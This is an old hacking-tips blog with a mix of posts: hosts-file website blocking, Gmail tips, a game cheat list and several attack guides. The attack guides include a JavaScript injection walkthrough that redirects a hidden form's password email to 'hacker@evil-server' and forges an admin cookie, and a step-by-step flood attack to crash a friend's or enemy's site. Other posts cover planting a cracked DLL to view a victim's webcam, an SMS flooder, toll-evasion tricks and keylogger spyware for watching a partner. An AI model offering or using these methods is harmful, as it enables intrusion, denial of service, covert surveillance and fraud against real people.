Latest News

How to Block a Website?

Posted by hang on Monday, December 7, 2009 , under | comments (0)






Some times it becomes necessary to block a website on our Computers for one or other reason.You can easily and effectivily block access to a website by adding it to your Windows HOSTS file.Once the website is blocked in the HOSTS file,it will not appear in any of the browsers.That is,the website becomes completely unavailable.
 

1.Go to your HOSTS file which is located at:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME
2. Open HOSTS with Notepad.
The default Windows HOSTS looks like this:
______________________
# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________
3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:
127.0.0.1 name of the URL you want to block
For example to block the website MySpace.com, simply type:
127.0.0.1 myspace.com
127.0.0.1 www.myspace.com
Other parts of MySpace could be blocked in a similar way:
127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc…
It is necessary to add a website with and without the “www.”. You can add any number of websites to this list.
4. Close Notepad and answer “Yes” when prompted.
5. After blocking the website, test it in any of the browser.If every thing is done as said above,the website must not appear in any of the web browsers. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.

Some people suggest that your add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.

javascript injection attack

Posted by hang on , under | comments (0)



Javascript injections are simple to find and exploit. They’re used for editing client side data, mainly html forms and cookies. The only two commands that are of any use are void and alert. Alert is really simple understand just by looking at the pop up. Void is quite different, it’s used to modify forms or cookies.
Form editing:
Now it’s really simple to edit some form variables to change fiend names of even values. Lets imagine a page that sends the admin his password every time he clicks on a button:



input name="email" value="admin@some-rand-host.com" type="hidden"
input name="submit" value="Send Mail" type="submit"

Now we can see that in this cut of code that the main idea is to send an email to the hard coded address in the page (admin@some-rand-host). This is where javascript comes in handy to change the target email address:
This should be written directly into the url bar:

javascript:void(document.forms[0].email.value="hacker@evil-server")

Then we run the code by charging the url, then to view the results all you have to do is refresh the page.
Now read understanding the line:
first running the command : javascript:void()
then we define the variable we want to change: document.forms[0].email.value.
This means that we want to modify one of the forms inside the document, actually the form number 0. If it was the second form in then page then we would use: document.forms[1].email.value. Next we precise the name of the input control we want to modify followed by the field: … email.value.
So there you have it, you change the address of the recipient to your own for example then send a mail ;)
Cookie editing:
Cookies are used to keep simple variables and values on a client machine inside temporary internet files, cookies. These cookies could be used for example to keep track of your connection status, current theme, or in the worst cases: your user rights. It’s probably the simplest way but also the most unsure and dangerous for the webmaster, use cookies to keep track of the user rights. To see the cookies that a site serves us we can use the alert command again: javascript:alert(document.cookie) From there we can see if there are any vulnerable fields that we might be able to inject and control. Imagine a cookie like this one:

use_theme=darkblue;user_name=hackr;uid=2;

Now you can see that the cookie actually holds onto the variable “rights” which means that we can easily try to change it’s value and check out the results by running a command like this one:



javascript:void(document.cookie="uid=0")

With that line we just changed the value of uid from 2 to 1 which means that if the website treats uid 0 users as administrators then we are now admins ;) Thankfully this is a vulnerability based on trusting users that’s being found less and less in the wild.


  1. Try these injections:


    • javascript:alert("Hello!");
      • This will bring up an alert box saying "Hello!"

    • javascript:alert("Hello"); alert("World");
      • This will bring up 2 alert boxes. The one in the front will say "Hello" and once you click OK, the one saying "World" will appear.

    • javascript:alert(document.forms[0].to.value="something")
      • This will change the value of form [0] to something.

    • javascript:void(document.bgColor="blue")
      • This will change the background color to blue. You can put any other color in the place of blue to change it to a different color.

    • javascript:alert("The actual url is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
      • This long injection will tell you the real server name of the site you are looking at. You should use it if you think that you are viewing a spoofed website. Or anytime just to make sure.

    • javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
      • This long injection will make pictures fly around. Make sure to find a site like Google Images so there are more pictures!(If you press the refresh button, it goes really fast! might only work with MAC)


  2. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.cos(R*x1+i*x1+x2)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
  3. Note that this is an alternate to the spinning circle of pictures. It funnels the pictures in a snake-like motion.


    • javascript:document.body.contentEditable='true';document.designMode='on';void0

  4. Note that this injection allows you to move things around on the webpage. However, any changes you make here are not permanent, and can only be seen by you.

Hack nepal telecom phone

Posted by hang on , under | comments (0)



Once again another trick have been found for NTC. You can call it whatever tips, tricks, tweaks, HACK or loophole since this feature has not been officially launched yet. The system I am talking about is Voice mail system for GSM Pre-paid users of NT. This will allow you to send receive voice message to specified phone (the receiver and sender both must have activated voice mail system in order to exchange voice messages).
And the thing which makes it special is that it's FREE, totally free. NTC doesn't charge any fees for sending and receiving voice message. This feature may come handy when you don't have any balance to call or SMS.

Nepal Telecom has been providing Voice Mail Box service since the beginning of Mobile Service in Nepal. Voice Mail Service allows the user to be always in touch. In order to use the voice mail service, user must have CALL FORWARDING facility. If the user wants his/her incoming calls to be diverted to the Voice Mail server on different conditions (like unconditionally, on busy, no reply or out of reach for postpaid and unconditionally only for prepaid subscriber ), he/she must set the call forward number as 011614 in the user's mobile set. When the call forward service to the voice mail is activated, the incoming calls will be diverted to the voice mail box according to the conditions specified by the user. The calling party can leave the voice message in the mail box of the called party. Once the message is recorded in the mail box, the user will be notified about the new message through Short Message Service (SMS).

The user can then dial his voice mail box and check the new or old messages and manage mail box by dialing the Voice Mail number 011616. It should be noted that the user has to use own mobile SIM to access the voice mail service by this method. Once the user is connected to the voice mail server, the system will guide the user for different options in the service through interactive voice prompts. Users have to listen carefully to the guidelines provided by the system for familiarizing themselves to the service.
  1. Voice Mail Subscription Charge : None

  2. Message Deposit Charge : When the Incoming Calls are transferred to Voice Mail Box, the message duration will be charged as the air time charge of the outgoing mobile calls.

  3. Message Retrieval Charge : There will be no extra charge for the retrieving the messages from the voice mail box.

  4. Mail Box Management Charge : No additional charge for Mail Box management (Active/Inactive)
VMS Number for call deposit : 011614
VMS Number for call retrieval : 011616

Additional services available now:
  1. Miss call notification - some one dials a mobile number, if in case the call has been diverted to voice mail and the caller disconnect the call before the message deposit tone is heard, then the called number will be miss call information via sms.

  2. Heard Message Notification - A caller deposits a voice message. After the called party listens to the deposited message, the depositor (caller) will get sms confirming that his message has been heard by the called party.

- Nepal Telecom
Dialing 011614 to send voice message costs you air time charge.
To ACTIVATE VOICE MAIL SERVICE you'll have to follow the instructions below.
  1. Dial the code in bold letters in your phone, *21*011614# (This will send a service command to service provider and a message pops out with, Call Diverted or some thing similar to this. Never mind as you've dialed the number any message will be OK :) )
  2. Now you'll see a call divert icon in your normal stand by screen, the icon resembles the curved or turning arrow.
  3. Now check if the call divert works or not by calling to your own number.
  4. You'll be weclomed to Voice mail service after the notification of call diversion.
  5. Then you can Hangup.
  6. OK now get back to the phone where you have activated call divert option. Again in the stand by screen dial #21# . This will disable the call divert option and the call divert logo will disappear from your screen. Not every phone model shows call diver logo.

Congratulations, you've successfully activated the voice mail system from NTC.
You may ask, "where is the hack?" Here it is..
NTC claims the VMS Number for call deposit : 011614 , and dialing this number costs you airtime charge. So what you must do while sending voice message is follow the steps below, to SEND VOICE MAIL to another Voice mail service activated number)
  1. Put the following initial number while dialing any Voice mail service activated number, 011616984XXXXXXX i.e. 011616[YOUR NUMBER]
  2. Then follow the system guidlines.
If you followed the steps above you won't get any charges for sending and receiving voice mails.

To CHECK YOUR VOICE MAIL (INBOX)
  1. To check if you have voice mail or not, dial this number 011616, then follow the instructions by the robot.
This is totally free you won't get any amount charged for the exchange of message. You can record your message up to 60 Seconds. It can be useful to one who wants to hear voice instead of message.
I found this service pretty helpful. If you are not able to activate this system then don't hesitate to contact us. Enjoy Voice messaging ;)

UPDATE: This loophole is now removed by NTC. It no more works.

How to make unlimited free call using Yahoo messenger

Posted by hang on , under | comments (1)



I was exploring through some technology blogs. And I came across this blog, Techsense, where I found this really useful trick. I cannot guarantee you that this trick will work, but he claims that it works.

First you should be having yahoo messenger installed in your computer as most generally all
have it but in case if you dont have you can download it HERE

Sign up in your yahoo messenger as you usually do. There you'll see a box right on the top of the yahoo messenger containing some text (see in the snapshot below).


















Fill the numbers given below in that field.


+18003733411
When you make call to this number an operator will respond to you saying main menu. As soon as you hear get this response, reply them saying  free call.

After few moment when you hear a beep tone, a dial pad will popup in your computer screen where you'll have to dial the destination number including the country and area code. You have talk time up to 5 minutes using this method. But again starting over from the above steps, you can make unlimited calls everyday.

crashing website using IP

Posted by hang on , under | comments (0)



Your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it

TOOLS:
Port Scanner



Step One: First we need to find the websites IP Adress. This is very easy todo. Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s)

Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open

Step Three ALMOST DONE:

The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter your victims ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn't connect!
EXAMPLE:
Thanks for reading i hope this helps :)

new gmail hacking trick

Posted by hang on , under | comments (1)



It is interesting work to hack gmail and to know more about it's special features. Gmail beats all other email providers with its endless customization capabilities, Google product integration and fantastic spam filter. And today I am sharing you a very useful tricks, tips and cool hack for gmail. Take it to the next level with these Gmail power user tips and Greasemonkey extensions for Firefox. May this tricks and tips helps you to make you perfect g-mailer:)



1. Master the Gmail keyboard shortcuts
If you haven’t already, master the shortcut keys. Compose, mark as read, archive and much more with the press of a button. Sure, you know c for compose and ! for report spam, but do you know g + t for the sent mail folder
You can find a complete list at the official Gmail shortcut page.

2. Resize your gmail compose box
 The aptly-named Resizeable Textarea Firefox extension allows you to click and drag the edge of your compose box without resizing your browser window. Note that any browser built with the newest Opensource.org webkit—Safari, for example—will already have this capability. For more browser info, check out the internet software category.



3. View unread messages first
  Search on the string “label:unread label:inbox” to force all of your unread messages to the top of the list, writes Matt Cutts. (Note: you don’t have to create any labels for this to work.) Try bookmarking Cutts’s search and dragging it to your bookmarks bar to view all unread messages first.


4. Quickly switch between Google accounts
If you have multiple Google accounts—a Gmail with Google Apps account and a regular Gmail account, for example—streamline them with this script for Firefox with Greasemonkey. The script adds a “change user” drop-down bar in place of the “sign out” link.


You can also try Gmail Manager (also a Firefox extension), which adds a Gmail menu bar to the Firefox window. Juggle multiple accounts, sign in and out.




5. Gmail Notifier for Windows / Google Notifier for Mac
  Rather than keeping a browser window open and hitting CTRL-R like you've got OCD, install a widget like Gmail Notifier for Windows or Google Notifier for Macs. It'll check your email (and Google Calendar, if you're a Mac user) as compulsively as you do. And as with almost everything else under the sun, there's a Firefox extension that will serve the same function (it's not released by Google).





6. Use Gmail like an external hard drive
Use up any vegetating space in your Gmail account with this Windows drive shell extension. Your Gmail space appears in My Computer/Windows Explorer as an external drive, and when you drag and drop a file to the drive, it sends an email to your Gmail account with the file as an attachment. Note that this is a fairly old program but seems to have been updated for the latest Gmail version. Mac users can try gDisk and Linux users can check out GmailFS.



7. Hack Gmail’s CSS
  “Stylish is to CSS what Greasemonkey is to JavaScript,” says the Firefox extension page for Stylish. Cascade those style sheets yourself, or grab them from userstyles.org. For more web design tips and tricks, check out these web design and development resources.


8. Backup your Gmail
  If you’re using a desktop or smartphone mail client, you’ve already got some backups of your email. But what if you’re all web-based? What if Gmail servers were hit by a nuclear bomb? Stop the paranoia and check the Gmail backup tutorial here and the Google Apps backup tips here.


9. Include or exclude Chat from search results
Chat conversations are automatically filed like emails with a Chat label, so to exclude Chat when searching, use the string -label:Chat. Conversely, to search only Chat conversations, use the string +label:Chat. The –label: and +label: syntax will work to exclude or include any label in Gmail search results. Another Jim Barr tip.


10. Google Desktop Plug-In for Google Notifier
Some users have reported compatibility issues between Google Toolbar, Google Apps and Google Desktop. Everyone's configuration is different, blah blah blah, so it's impossible to know, but Maxim Alexeyev created this Google Desktop Plug-In which purports to replace Google Notifier for Google Desktop and Google Toolbar users. The plug-in also offers multi-username functions and Google Apps support.


11. Read your Google Reader RSS feeds in Gmail
  Treat your Google Reader RSS feeds the same way you treat old friends with this Greasemonkey + Firefox script. Feeds invading your Gmail will offer more-efficient time-wasting than ever before. Note that Google Reader and Gmail seem to be moving closer together in functionality and interface and it's likely that they'll soon be officially integrated.

12. Create a podcast of your Gmail
Without an iPhone or Blackberry, the morning subway ride can get pretty boring. And you can’t navigate a smartphone while driving—or at least, you shouldn’t. Create an RSS feed from your Gmail account with this syntax:
https://username:password@gmail.google.com/gmail/feed/atom
Then sign for a FeedBurner account to host and distribute it. Use a RSS to podcast site like AudioDizer.com or one of the many options at NextUp to create text-to-speech files. Voila! This hack is based on a tip from Mike Donaghy. For even more, check out these podcast resources.



The above tricks and trick of gmail are also included from other sites, and some of are my own tricks :) Hope you will learn these tricks. You can share your own tricks, tips or hack for gmail without any difficulty. Happy Hacking!

downlado cheat box

Posted by hang on Tuesday, October 20, 2009 , under | comments (0)




CheatBook is cheat code tracker with cheats, Tips, Tricks and hints for popular Games. 
 PC Cheat Codes
101 - The Airborn Invasion of Normandy
1503 A.D. - The New World
18 Wheels Of Steel - American Long Haul
18 Wheels of Steel - Haulin
18 Wheels of Steel - Pedal to the Metal
2025 - Battle for Fatherland
2029 Online
3D Movie Maker
3D Pinball - Space Cadet
A Bark in the Dark
A Reckless Disregard For Gravity
Abomination
Ace of Spades
Adventure Chronicles - The Search for Lost Treasure
Adventure Quest
Adventure Quest 2
Adventure Quest Worlds
Age Of Empires 3 - Asian Dynasties
Age of Mythology
Age of War
Aion - Tower of Eternity
Anno 1503
Ashes Cricket 2009
Avatar - The Game
Backyard Football 2004
Batman - Arkham Asylum
Batman - Vengeance
Battle Realms - Winter Of The Wolf
Battlezone 2 - Combat Commander
BioShock
Black & White
Black & White 2
Block Drop - Flash Game
Blockland
Bookworm Adventures Volume 2
Borderlands
Build-A-Bearville
Cake Pirate
Call Of Duty - World At War
Call of Duty 2
Call of Juarez - Bound in Blood
Canabalt
Captain Claw
Cars
Champions Online
Championship Manager 2007
Championship Manager 2008
Charger Escape
Chomper 3D
Civiballs 2
Clive Barker's Jericho
Cloudy with a Chance of Meatballs
Club Penguin
Code of Honor 3 - Desperate Measures
Combat Arms
Command & Conquer - Generals
Command & Conquer - Generals - Zero Hour
Command & Conquer - Renegade
Conflict - Global Storm
Conflict Desert Storm
Conflict Zone
Constantine
Cool 21
Cradle of Rome
Crash Bandicoot 3 - Warped
Cricket 2007
Cricket Revolution
Cyber Mouse Party 2
Darkest of Days
Dead Tree Defender
Deadliest Catch - Alaskan Storm
Demigod
Demonic Defense 4
DiRT 2
Diablo 2
Diablo 2 - Lord of Destruction
Dino Run
Dofus
Doom 3
Drag Racer V3
Dragon Cave
Dragon Fable
Dragon's Lair 3D
Dungeon Hero
Edge of Twilight
Elder Scrolls 3 - Morrowind
Elder Scrolls 4 - Oblivion
Emperor of the Fading Suns
Empire Strikes Back, The
Endless War 3
Enter The Matrix
Eragon
Escape from the Planet of the Robot Monsters
Europa Universalis - Crown of the North
Europa Universalis 3
Evil Genius
Evony
Exmortis 3
F.E.A.R. 2 - Reborn
Fable - The Lost Chapters
Fabulous Finds
Fallen Empire - Legions
Fallout 3
Fallout 3 - Mothership Zeta
FantAge
Farm Frenzy 2
Feeding Frenzy 2
Feudalism 2
Fifa Manager 2009
Final Fantasy 7
Flw Professional Bass Tournament 2000
FlyFF
Football Manager 2009
Free Realms
Freedom Fighters
FusionFall
Gangland
Gemini Lost
GetAmped
Ghajini - The Game
Ghost Recon
Ginormo Sword
Google Earth - Flight Simulator
Gothic 2
Gothic 3 - Forsaken Gods
Grand Chase
Grand Theft Auto - San Andreas [Part 2]
Grand Theft Auto - Vice City
Grand Theft Auto 3
Grand Theft Auto 3 [hints]
Grand Theft Auto 4
Guitar Hero World Tour
Gun
Habbo Hotel
Halo
Halo 2
Hammer Heads Deluxe
Hearts of Iron 3
Heli Attack 3
Heroes of Might & Magic 1
Heroes of Newerth
Hidden & Dangerous
Higher!
Hitman - Codename 47
Hitman - Contracts
Hitman 2
Hunter Hunted
Hunting Unlimited 2010
I. M. Meen
Interactive Buddy
Jurassic Park - Operation Genesis
Knight Rider 2
League of Legends
Lego - Mars Mission
Lego Island 2
Lego Racers 2
Lego Rock Raiders
Little Big Adventure 1
Lord Of The Rings - The Battle for Middle-Earth 2
Luna Online
M.I.B. - Men in Black
Madballs in Babo - Invasion
Madden NFL 2005
Madden NFL 2007
Madness Interactive - Halo Slayer
Maple Story
Mario Forever 4.4
Mass Effect
Max Dirt Bike 2
Max Payne
Max Payne 2 - The Fall of Max Payne
MechQuest
Medal of Honor - Pacific Assault
Mercenary Wars
Metal Gear Solid
Mortal Kombat 4
Moshi Monsters
Moss
My Kingdom for the Princess
MySims
NBA 2K9
NBA Live 2001
NFL Rush Zone
Naruto Arena
Need For Speed - Carbon
Need For Speed - ProStreet
Need for Madness
Need for Speed - Most Wanted
Need for Speed - Underground 2
Need for Speed 2
Neuro Hunter
Neverwinter Nights 2 - Mask Of The Betrayer
Ninja Blade
OurWorld
Overlord II
Pandemic - American Swine
Phantasy Star Online - Blue Burst
Pirates of the Caribbean
Platform Racing 2
Pokemon Emerald
Pokemon Indigo
Pokemon Moon RPG
PokemonLake
Poptropica
Populous - The Beginning
Port Royale
Powder Game
Prince of Persia - The Two Thrones
Prince of Persia 2 - Warrior Within
Project IGI- I'm going in
Prototype
Pyroblazer
Quantz
Race On
Raft Wars
Rage 3
Rainbow Six - Rogue Spear
Raptor - Call of the Shadows
Real War - Rogue States
Realms of Chaos
Red Faction - Guerrilla
Relentless - Twinsen's Adventure
Resident Evil 4
Resident Evil 5
Restaurant City
Riddle of the Sphinx
Righteous Kill 2
Risen
Risk Your Life 2 - Incomplete Union
Riven - The Sequel to Myst
Road Rash
Road Rash 3D
Road To Bagdad
Road Wage
Road Warrior
Road Wars
Road to India
Roadblasters
Robin Hood - Defender of the Crown
Robin Hood - The Legend of Sherwood
Robin Reno
Roblox
RoboBlitz
Robocop 1
Robocop 2D
Robocop 3
Robot Arena
Robot Arena 2 - Design And Destroy
Robot Rage
Rogue Warrior
Roller Coaster Kingdom
RollerCoaster Tycoon
Rome Total War
RuneScape
S.C.A.R.S
S.T.A.L.K.E.R. - Shadow Of Chernobyl
Saints Row 2
Samurai Warriors 2
Scary Maze
Section 8
Settlers 3
Shadowtale
Sherwood Dungeon
Shin Sangoku Musou 5
Silent Hunter 3
Soakamon
Sonny 2
Star Wars - Battlefront
Star Wars - The Clone Wars - Republic Heroes
Star Wars - The Force Unleashed - Ultimate Sith Edition
StarCraft
Stardoll
Stick Arena Ballistick
Stick Cricket
Stick RPG Complete
Stickman Madness 3
Storm The House 3
Street Legal 2 Redline
Super Smash Flash
Swords and Sandals 2 - Emperor's Reign
TG Motocross
Team Fortress 2
Territory War Online
Texas Cheat 'Em
The Classroom 3
The Fifth Disciple
The Last Stand 2
The Road To El Dorado - Gold And Glory
The Sims 2
The Sims 2 - Double Deluxe
The Sims 2 - Mansion and Garden Stuff
The Sims 3
The Sims 3 - World Adventures
Touhou Hisouten - Scarlet Weather Rhapsody
Transarctica
Tropico 3
Urban Brawl - Action Doom 2
Venetica
Virtua Tennis 2009
Virtual Families
Virtual Villagers 3 - The Secret City
WWE Raw - Total Edition
WarCraft 3 - Reign of Chaos
Warhammer 40,000 - Dawn Of War - Dark Crusade
Warhammer 40,000 - Dawn Of War - Winter Assault
Warhammer 40,000 - Dawn Of War 2
WarpForce
Windows Pinball XP
Wizard 101
Wolfenstein
Wonderland Adventures
World Domination 2
Worms World Party
X-Men Origins - Wolverine
X3 - Terran Conflict
Zombie Apocalypse
Zuma's Revenge!
Zwinky

 PC Walkthroughs
Abuba the Alien
Air Craft Escape
Alchemia
Alice is Dead
Allied Escape
Andy - The Cave of Treasure
Bear in Cage
Being One - Part Three - Dark Matter
Bird's Egg
Bomb Escape 3
Caverns
Clown Face Escape 3
Dead Frontier: Outbreak
Dream Escape Strategy
Erzuroom Escape 3: Room Z
Escape Velocity Nova
Escape from Blender Art Gallery
Exodus from the Earth
Find the Escape Men - 2 - In the Telephone Box
Find the Numbers Challenge 26
Heist
Hospital Escape
Ice Room Escape
Inspector Wombat
Kafkamesto
Kidnapped by Aliens 2
Life Ark 5
Make it Good
Monkey Climbs
Mr. Jones Graveyard Shift
Office Escape (Rogue Poker)
Omelette Room Escape
Poptropica - Spy Island
Princess Isabella and the Witch's Curse
Rescue Your Girlfriend
Rings Of Zilfin
Robot City
Shower Escape
Steak Room Escape
Stick Arena - Ballistick
Sudeki
The Life Ark 2
The Life Ark 3
The Life Ark 4
U-boat Escape
Village Escape Part 3
Volcano Escape
Ying Yang Escape 3

 Console Cheats
ActRaiser
Advance Wars - Dark Conflict
Aerowings
AirBoardin USA
Animaniacs - Lights, Camera, Action!
Area 51
Armored Core - For Answer
Assassin's Creed
Asterix At The Olympic Games
Automobili Lamborghini
Bankshot Billiards 2
Baroque
Battlestar Galactica
Bionicle - The Game
Bleach - Shattered Blade
Blitz - The League 2
Brothers In Arms DS
Bully
CART Fury Championship Racing
Call Of Duty 3
Chao Adventure
Chew Man Fu
Code Lyoko - Quest For Infinity
Conflict Global Storm
Contra III - The Alien Wars
Crash Tag Team Racing
Def Jam Fight For NY
Donald Duck - Goin' Quackers
Elemental Gimmick Gear
Expendable
Frogger 2 - Swampy's Revenge
God of War 2
Justice League Heroes
Legend of Zelda - Ocarina of Time
Lego Indiana Jones - The Original Adventures
Pokemon Sapphire
Resident Evil 4
Road Trip - Shifting Gears
Saints Row 2
Scorpion King, The - Sword of Osiris
Skate cheats
Star Wars Battlefront 2
Super Mario 64 DS
Super Puzzle Fighter 2 Turbo HD Remix
Tekken 4
Total Overdose - A Gunslinger's Tale in Mexico
Twisted Metal 2
UEFA Champions League 2004-2005
Wakeboarding Unleashed
Wii Sports
Worms 4 - Mayhem
Yoshi's Story
Yu-Gi-Oh! Dawn Of Destiny

hack

Posted by hang on , under | comments (0)



          BSNL 3G hack
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
actrivated in 24 hours, after activation get gprs settings by calling c.care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g

t;network>network mode> now select UMTS

THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default


Now see your data singnals logo..... vola it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as ur access point

This trick is copy pasted from some other source
but its 100% working
Enjoy 3G at appr.

Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
actrivated in 24 hours, after activation get gprs settings by calling c.care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g

t;network>network mode> now select UMTS

THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default


Now see your data singnals logo..... vola it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as ur access point

This trick is copy pasted from some other source
but its 100% working
Enjoy 3G at appr.



See Anyones Yahoo Webcam

yahoo-messengerThis is new trick to hack web cam of Yahoo messenger. We can view the other persons Yahoo Webcam, Who is always denying us.
Follow the below steps to do this

1) Open the following location C:\Program Files\Yahoo!\Messenger

2) You will find the file ” res_msgr.dll “. Delete this file.

3) Download this cracked file from the below link

Click Here

4) After Downloading it, Paste this in (C:\Program Files\Yahoo!\Messenger)

NOTE: Don’t replace the file. Delete the file first and then paste the cracked file in the same folder

Then close every thing and restart the system…

How it works?

The cracked “dll” file should be placed in the victims computer (whose web cam u want to see). Then you go back to your system and login to your messenger and place a “request” to see their cam. Then definitely they will press “NO” this is the place where the crack will work. The moment they press “NO” u will start seeing them. This is the hack. Enjoy.

Reveal Hidden Passwords

Freeware to Reveal Hidden Password

WARNING:- STEALING PASSWORD IS CRIME

There are some cases that we forgot the passwords previously saved in the software or website, yet we need to get the password urgently! The password field shows only “********”, without any password hints or help! What do you do?

Don’t knock your head against the wall. Here I introduce two freeware that help you to recover the masked password.

Asterisk Key
Asterisk Key - Reveals hidden passwords

Asterisk Key – Reveals hidden passwords

Asterisk Key can reveal hidden passwords on password dialog boxes and web pages. Launch Asterisk Key, and it will scan active window for password dialog box and show the hidden password. Work best for web pages.

[ Homepage - Download ]

Password Reveal
Password Reveal
Password Reveal works for windows program, not web pages. Simply drag and drop the cross sign to the password dialog box, it will show the masked password.
Homepage - Download ]
Thought:
Please use these tools wisely. I only use them only to recover the passwords that previously saved(and does not write down anywhere) by company’s ex-IT executive.




Ibibo SMS Flooder

Ibibo SMS Flooder - XxSidxX


Hey guys.....
I have made a new flooder which uses ibibo service to flood the number.
[REQUIREMENTS]
1. Ibibo Account. { https://auth.ibibo.com/register }
2. Your Mobile activated with ibibo Account. { http://imobile.ibibo.com/Call/Start.aspx?turl=http://isms.ibibo.com/ }
3. Number you want to flood


[NOTE]
1. Flooder might stop working after some time because its Ibibo ....
2. Your Number will be displayed in the message.
3. Might be slow . Use it only if u want...
4. FLOODING IS ILLEGAL. USE AT YOUR OWN RISK {Using pirated windows is also illegal }
5. Not more then 50 sms at a time because i dont have a good server.


[WEBSITE]
http://flannery-nissan.com/xxsidxx/sms.php


Cheating

Posted by hang on , under | comments (0)




How to Catch My Boyfriend Cheating Online

 



Facebook, MySpace, Twitter, these are all fun sites to get into and they provide plenty of advantages for people. But these sites are not as innocent as they seem. In fact, your boyfriend might be using these sites right now to hook up with other women.

Indeed, the question how to catch my boyfriend cheating online is something that is being asked by women who suspect that their boyfriends is really doing something fishy on the Internet. Do you know all of your boyfriend s friends in Facebook and MySpace? Do you know whom he is regularly Tweeting? If not, then you probably need to be more aware of your boyfriend s online activities.

The Internet is a very useful tool but it can also be used for dirty deeds such as cheating. But if you are asking the question how to catch my boyfriend cheating online, then you must know that there are ways to effectively do it and you will know them here in this article.

How To Catch My Boyfriend Cheating

Use your female intuition. Women have the innate capacity to know whether their boyfriend is doing something behind their backs or not and this is called female intuition. There are women who have very keen senses and they are able to accurately tell whether or not their boyfriends are cheating or not. Of course, female intuition is not a very reliable way to tell whether or not your significant other is seeing someone else. And if you confront your boyfriend if he is cheating or not citing female intuition as your only basis, then you will only look foolish in front of your boyfriend and he will be able to quickly dismiss your allegations.

Use computer and online tools. To catch your boyfriend red handed what you need are evidences and to gather evidences, you will need tools. You will be delighted to know that you do not need to rely purely on female intuition alone because there are available computer and online tools that can help you determine whether or not your boyfriend is cheating or not. One of these tools is a email finder program which can determine important information about a person using only his or her email. The only problem with this tool is that you still need to get the email of the person whom your boyfriend is regularly communicating with to use this tool.

If you don t have a mystery email yet then you can use a computer monitoring program to track and record all of your boyfriend s activities online. Some of these programs will even allow you to monitor your boyfriend s computer from a remote location using the Internet. Though such a program, you can easily know what websites your boyfriend is visiting, the persons he is emailing and even the keystrokes that he is inputting on his PC. It will do all the hard and risky work for women who simply cannot do the spying themselves.

So if you are asking, how to catch my boyfriend cheating online, know that you have many options to do so.
Are you still asking yourself how to catch my boyfriend cheating online? Visit us NOW and get the tools you need to get the job done. Verny L is the owner of http://www.catchcheating.net. Get all the information you need, get all the tools you need so you can find out the truth.


How to Find Out What Websites Your Husband is Visiting Online

 


How to find out what websites your husband is visiting online. Cheating has been around for thousands of years. It is probably as old as marriage itself. The means of cheating though have evolved. Before, the only opportunity for people to cheat is when they meet someone either from work or from some place that they have gone to. Now, individuals can cheat through virtual worlds using the power of the Internet.

